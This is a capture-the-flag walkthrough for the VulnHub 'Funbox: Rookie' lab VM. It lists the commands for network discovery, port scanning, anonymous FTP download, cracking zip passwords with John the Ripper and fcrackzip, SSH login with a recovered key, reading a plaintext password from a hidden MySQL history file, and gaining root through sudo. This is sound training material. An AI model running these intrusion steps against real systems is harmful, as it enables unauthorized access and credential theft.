https://www.vulnhub.com/entry/funbox-rookie,520/

Discoving Target IP

  • sudo nmap -sn 192.168.122.0-255
  • sudo netdiscover -P -i eth0 -r 192.168.122.1/24

Scan Ports

  • nmap -p- 192.167.122.58 scan all open ports
  • nmap -p 21,22,80 -sC -sV 192.168.122.58 to get more informations on those open ports

Port 80

Port 21

  • ftp 192.168.122.58 to access FTP server on it, because from using nmap we know that using Anonymous login is ok, we can use username anonymous and empty password
  • once we are in the FTP server, ls -la to show all files
  • get <filename> to download one of the file
  • mget * to download multiple or all files
  • exit to leave FTP server

Cracking ZIP files

  • we now have many zip files, but all of them are password protected.

we can try to use John the Ripper to crack it

  • zip2john tom.zip > tom.txt will convert zip to hash file
  • john tom.txt will be able to crack it using default wordlist
  • unzip tom.zip -d tom and using password iubire to unzip it

or we can try to use Fast Zip password cracker

  • gzip -d /usr/share/wordlists/rockyou.txt.gz to decompress password list
  • fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt cathrine.zip to crack it using Rockyou password list
  • unzip catherine.zip -d catherine

Port 22

  • ssh tom@192.168.122.58 -i id_rsa to SSH into the target machine as tom

Get out of rbash

Get user password

  • Now we are in home directory of tom, list file by ls -la, and there is a hidden .mysql_history file.
  • open it there is a line insert\040into\040support\040(tom,\040xx11yy22!); we can probably guess in(tom,\040xx11yy22!), tom is the username, and \040xx11yy22! is the password, but \040 is ASCII for space, so tom’s password is xx11yy22!

Elevate Privilage

  • now with tom’s username and password, run sudo -l to all commands that tom can run with sudo, it has
User root may run the following commands on funbox2:
    (ALL : ALL) ALL
  • so we can just run sudo bash to open a root shell

Capture the Flag

  • navigate to /root
  • get flag.txt